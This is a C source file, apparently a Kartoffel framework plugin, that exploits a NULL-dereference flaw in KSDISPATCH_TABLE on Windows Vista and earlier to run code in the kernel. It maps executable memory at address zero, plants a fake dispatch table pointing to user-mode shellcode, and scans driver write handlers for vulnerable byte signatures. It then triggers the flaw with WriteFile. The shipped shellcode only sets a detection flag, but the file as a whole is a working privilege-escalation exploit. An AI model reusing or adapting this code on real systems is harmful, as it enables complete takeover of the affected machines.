

#include "stdafx.h"

#define IRP_MJ_WRITE                    0x04
#define OS_2K							0
#define OS_XP_2K3_VISTA					1

	//// typedef stuff

typedef ULONG (WINAPI *PNTALLOCATE)(IN HANDLE               ProcessHandle,
									IN OUT PVOID            *BaseAddress,
									IN ULONG                ZeroBits,
									IN OUT PULONG           RegionSize,
									IN ULONG                AllocationType,
									IN ULONG                Protect );


typedef struct {
  ULONG_PTR  DeviceIoControl;
  ULONG_PTR  Read;
  ULONG_PTR  Write;
  ULONG_PTR  Flush;
  ULONG_PTR  Close;
  ULONG_PTR  QuerySecurity;
  ULONG_PTR  SetSecurity;
  ULONG_PTR  FastDeviceIoControl;
  ULONG_PTR  FastRead;
  ULONG_PTR  FastWrite;
} KSDISPATCH_TABLE, *PKSDISPATCH_TABLE;


	//// Native API
 PNTALLOCATE        NtAllocateVirtualMemory;

 
 
 BOOL FlagVulnerable = FALSE;

_declspec(naked) void ShellCode()
{
	_asm{
		mov FlagVulnerable,1
		retn 0x8
	}
}


BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
					 )
{
    return TRUE;
}

void CheckOS ( PDWORD lpOS )
{
	OSVERSIONINFOA  strOs;
	strOs.dwOSVersionInfoSize = sizeof( OSVERSIONINFOA );

	if ( GetVersionExA( &strOs ) )
	{
		if (strOs.dwMajorVersion == 5)
		{
			switch( strOs.dwMinorVersion )
			{
				case 0:
					*lpOS = OS_2K;
					break;
				case 1:
				case 2:
					*lpOS = OS_XP_2K3_VISTA;
					break;		
			}
		}	
		else if (strOs.dwMajorVersion == 6)
		{
			*lpOS = OS_XP_2K3_VISTA;
		}
	}

}

 int Callback_Overview()
{
	printf("\n");
	printf("=================================================	\n");
	printf("	Microsoft Windows Vista and earlier		\n");
	printf("       KSDISPATCH_TABLE Privilege Escalation	\n");
	printf("=================================================	\n");
	printf("  Ruben Santamarta (reversemode.com)\n");
	printf("+ References:\n");
	printf("  www.reversemode.com\n\n");
	return 1;
}

int Callback_Direct( char *lpInitStr )
{
	KARTO_DIRS		kDirs;
	WCHAR			**lpDevices = NULL;
	LPVOID			pKern=NULL, addr = (LPVOID)3;
	HANDLE			hKdevice;
	HMODULE			hNTdll;
	char			szKdriver[MAX_PATH];
	BYTE			lpWrite[0x30]={0}; 
	DWORD			dwNum = 0,i = 0, b=0, dwStatus,osVersion=1,dwShellSize=0x1000;
	DWORD			signature_size,sig_offset,junk,lpTmp;
	BOOL			bVulnerable = FALSE;
	DRIVER_OBJECT	drvObj;
	KSDISPATCH_TABLE stFakeTable = {0};
	unsigned char	*signature;
	int				status = 0;
	
	unsigned char	signature_XPSP2_Vista_2K3[]="\x8B\x41\x60\x8B\x40\x18\x8B\x40"
												"\x0C\x8B\x00\x8B\x00\x51\xFF\x75"
												"\x08\xFF\x50\x08";
	
	unsigned char	signature_2K_SP4[]="\x50\x8B\x48\x60\xFF\x74\x24\x08"
									   "\x8B\x49\x18\x8B\x49\x0C\x8B\x09"
									   "\x8B\x09\xFF\x51\x08";
	
	
	Callback_Overview();



	///// Dinamyc stuff

	hNTdll = GetModuleHandle( "ntdll.dll" );
 
	printf("\t + NtAllocateVirtualMemory");
	NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(hNTdll,
                                                         "NtAllocateVirtualMemory");
	
	if( !NtAllocateVirtualMemory ) 
		return 0;
	printf( "\t\t [ 0x%p ]\n",NtAllocateVirtualMemory );



	printf("\n[+] Allocating memory at [ 0x%p ]...",0);

	status = NtAllocateVirtualMemory(	INVALID_HANDLE_VALUE, 
										&addr, 
										0,
										&dwShellSize,
										MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, 
										PAGE_EXECUTE_READWRITE );

	if( (ULONG_PTR)addr )
	{
		printf("[*] Error while allocating memory\n");
		return 0;
	}
	printf("OK\n");
	printf("[+] Setting up the fake KSDISPATCH_TABLE ...");
	
	stFakeTable.Write = (ULONG_PTR) ShellCode;
	
	memcpy(	(void*)((ULONG_PTR)addr + 0x20),
			(void*)&stFakeTable,
			sizeof(KSDISPATCH_TABLE) );

	*(ULONG_PTR*)addr = sizeof(ULONG_PTR); // Fake FsContext
	*(ULONG_PTR*)((ULONG_PTR)addr + sizeof(ULONG_PTR)) = 0x20;

	printf("OK\n");

	
	/// Checking Windows Version

	CheckOS( &osVersion );
	
	if( !osVersion )
	{
		signature = signature_2K_SP4;
		signature_size = sizeof( signature_2K_SP4 ) - 1;
		sig_offset = 4;
	
	}	else 	{
		
		signature = signature_XPSP2_Vista_2K3;
		signature_size = sizeof( signature_XPSP2_Vista_2K3 ) - 1;
		sig_offset = 8;
	
	}

	hKdevice = OpenKDevice();

	if (hKdevice == INVALID_HANDLE_VALUE) 
	{
		InitializePaths(&kDirs);
	
		sprintf(szKdriver,
				"%s\\kartoffel.sys",
				kDirs.KARTO_PATH);

		printf("\n\n[+] Kartoffel.sys not detected. Loading %s\n",szKdriver);
		if( !LoadDriver( szKdriver,"KartoffelDrv") )
		{
			printf("[!] Unable to load kartoffel.sys\n");
			exit(0);
		}
		
		hKdevice = OpenKDevice();
		
		if( hKdevice == INVALID_HANDLE_VALUE ) 
			return 0;
	}
	
	//// Searching vulnerable devices

	dwNum = EnumDevices ( ( WCHAR** )&lpDevices );
	
	printf("\n[+] Searching vulnerable devices...\n\n");
	for( i = 0; i< dwNum; i++ )
	{
		printf("\r\t :: %d analyzed",i);
		dwStatus = GetDriverObjectByName ( lpDevices[i], &drvObj );
			
		if( dwStatus )
			{
				
				/// Compares IRP_MJ_**** with the signature
				dwStatus = ReadKernelMemory( ( LPVOID ) lpWrite,
											( LPVOID )
											( ( ULONG_PTR) drvObj.MajorFunction[IRP_MJ_WRITE]
											+ sig_offset ),
											signature_size);
				
				
				if( dwStatus )
				{
					
					/// The signature matches ?
					if (!memcmp(( LPVOID ) lpWrite,
								( LPVOID ) signature,
								signature_size) )
					{
						
						HANDLE	hDevice;  
						char	*szDrvName,*szFilename;
						char	szPath[MAX_PATH]={0};
						LPVOID	baseaddr;
	
					
						hDevice=OpenDevice(lpDevices[i],
											TRUE,
											FALSE,
											TRUE,
											0,
											0);

						printf("\n\n\t [ !! ] \"%ws\" seems potentially vulnerable, verifying...\n",lpDevices[i]);
							
						if( hDevice != INVALID_HANDLE_VALUE ) 
						{
							

							/// Issues a Write operation to trigger the shellcode
							status = WriteFile(	hDevice,
												&lpTmp,
												sizeof( DWORD ),
												&junk,
												NULL);

							if( FlagVulnerable )
							{
								
								int dvLen = wcslen (drvObj.DriverName.Buffer);
								int len = WideCharToMultiByte (CP_ACP, 0, drvObj.DriverName.Buffer, dvLen, NULL, 0, 0, 0) + sizeof(WCHAR);
								szDrvName = (char*)calloc( len, sizeof(char));
								WideCharToMultiByte(CP_ACP, 0, drvObj.DriverName.Buffer, dvLen, szDrvName, len, 0, 0);
								
								// Dirty hack
								szFilename = strstr(szDrvName + sizeof(char),"\\") + sizeof(char);

								printf("\n\t==== Cut & Paste ====\n\n");
								printf("\n\t [ *** ] Device \"%ws\" is  vulnerable", lpDevices[i] );
								printf("\n\t :: Vulnerable driver found \"%ws\"\n",drvObj.DriverName.Buffer );
								
								if( GetDriverInfoByName( szFilename, szPath, &baseaddr ) )
									printf("\t :: This driver is located at: \"%s\"\n\n",szPath);
								
								printf("\n\t==== Cut & Paste ====\n\n");
								
								status = TRUE;
								FlagVulnerable = FALSE;
								free(szDrvName);

							} else {
								printf("\n\t [ :( ] False alarm\n\n");
							}

							CloseHandle(hDevice);
							FlagVulnerable = FALSE;
						}
						
					}
				}

				free(drvObj.DriverName.Buffer);
			}
		
		
	}


	if( !status ) 
		printf("\n\n[+] Nothing found\n");

	return status;
}